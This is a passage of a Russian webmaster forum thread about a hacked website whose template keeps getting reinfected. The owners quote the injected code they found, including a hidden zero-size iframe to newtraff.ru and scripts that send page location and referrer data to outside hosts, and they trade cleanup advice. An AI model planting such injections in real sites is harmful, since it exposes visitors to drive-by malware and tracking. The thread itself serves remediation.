При открытии сайта вылазит такая хрень

12
LoveBeer
На сайте с 10.11.2012
Offline
22
#11

жестоко,даже бесплатный Аваст блокирует трояна. ТС,срочно ищите специалиста

VHS-1980
На сайте с 21.05.2010
Offline
91
#12
Zevss:
К сожалению это так, только он стал еще более агрессивным. Прошу помощи. Спасибо!

Прочтите очень внимательно о том, что написал anevrine. Если же горят сроки и сайт надо срочно открывать - я бы порекомендовал вырезАть все теги IFRAME из контента перед его выдачей движком регулярками, но это лишь полумера чтобы не останавливать сайт. Сразу оговорюсь - такая возможность не всегда есть в движках, а Вашего движка я не знаю.

LoveBeer
На сайте с 10.11.2012
Offline
22
#13

Ребята, у тех кто ломает наши сайты , наверняка имеется свой тематический форум где они делятся методами взлома, было бы полезно почитать его. кто знает адресок скиньте плиз

17
На сайте с 20.12.2009
Offline
72
#14

Это что за скрипты ?

<script type="text/javascript" charset="windows-1251" src="http://onlinerotator.net/codes/14939/14546_timekino.ru.js"></script>

<script language="javascript" src="http://uno.wt-rotator122.ru/?t=br&noadult=1&pid=30257"></script>

<script type="text/javascript">

function stopError(){return true;}

window.onerror = stopError;

var am_jq=0; if(window.jQuery){am_jq=1;}

var am_loc=escape(top.location.href.substring(0,255));

var am_ref=escape(document.referrer.substring(0,255));

var am_title; try{am_title=encodeURIComponent(document.getElementsByTagName("TITLE")[0].innerHTML.substring(0,100));}catch(e){am_title="";}

var am_rand=Math.floor(Math.random()*10000);

var am_code_cu=document.createElement("script"); am_code_cu.type="text/javascript";

am_code_cu.src="http://am10.ru/code.php?type=cu&jq="+am_jq+"&rand="+am_rand+"&u=11248&loc="+am_loc+"&ref="+am_ref+"&title="+am_title;

document.body.appendChild(am_code_cu);

var am_code_sb=document.createElement("script"); am_code_sb.type="text/javascript";

am_code_sb.src="http://am10.ru/code.php?type=sb&jq="+am_jq+"&rand="+am_rand+"&u=11248&loc="+am_loc+"&ref="+am_ref+"&title="+am_title;

document.body.appendChild(am_code_sb);

</script>

02rus
На сайте с 30.05.2012
Offline
39
#15
LoveBeer:
Ребята, у тех кто ломает наши сайты , наверняка имеется свой тематический форум где они делятся методами взлома, было бы полезно почитать его. кто знает адресок скиньте плиз

наверно тусуются тут-среди нас 😂

Позаимствовав идею российского Яndex и его слогана: “Яndex. Найдется всё”, PR-работники Yahoo разработали свой слоган для русскоговорящей аудитории - “Yahoo его знает”….
Zevss
На сайте с 23.03.2008
Offline
385
#16

Я удаляю с шаблона:

<iframe src="http://newtraff.ru/go.php?sid=3" width="0" height="0" frameborder="0"></iframe><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

а оно само снова прописывается.

Где искать совершающее это действие заразу?

Продаются сайты с доходом, недорого https://www.maultalk.com/topic356667.html
S
На сайте с 06.08.2008
Offline
130
#17

ТС, снеси все с хоста, смени все пароли, залей последнюю версию чистого движка и восстанови БД, предварительно проверив посты на фреймы..

A
На сайте с 20.08.2010
Offline
775
#18
Zevss:

а оно само снова прописывается.
Где искать совершающее это действие заразу?

Чистить сайт нужно. На dle последний раз находил заразу в папке uploads, расплодилась так, что занимала несколько сотен мб (!)

12

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий